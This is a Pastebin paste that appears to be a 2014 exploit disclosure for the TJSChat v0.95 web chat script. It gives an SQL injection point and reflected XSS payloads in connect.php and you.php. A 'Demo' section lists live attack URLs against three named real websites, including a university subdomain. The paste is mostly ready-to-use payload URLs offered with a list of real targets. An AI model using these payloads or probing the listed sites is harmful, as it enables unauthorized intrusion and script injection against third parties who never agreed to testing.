Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ###################################################################################
- # Title : TJSChat v 0.95 - Multiple Vulnerabilities
- # Author : SoUiLaHxXx_Dz
- # Date : 12-02-2014
- # Category: WebApp
- # Dork : n/a
- ###################################################################################
- Vuln's:
- sql injection in /connect.php
- ------------------------------------
- ExPlOiT :
- http://127.0.0.1/TJSCHAT/connect.php?user=1&dummy=[Inject Here]
- ...
- xss in /connect.php
- ------------------------------------
- ExPlOiT :
- http://127.0.0.1/TJSCHAT/connect.php?user=<script>alert(1);</script>&dummy=1
- ...
- xss in /you.php
- ------------------------------------
- ExPlOiT :
- http://127.0.0.1/TJSCHAT/you.php?user=<script>alert(1);</script>
- ...
- Demo :
- http://chezpimprenelle.com/tjschat/connect.php?user=1&dummy=%27
- http://www.infolabs.ch/tourDuMonde/chat/you.php?user=<script>alert('By SoUiLaHxXx_Dz');</script>
- http://amicale.univ-montp3.fr/applicationPHP/tjschat/you.php?user=<script>alert(1);</script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement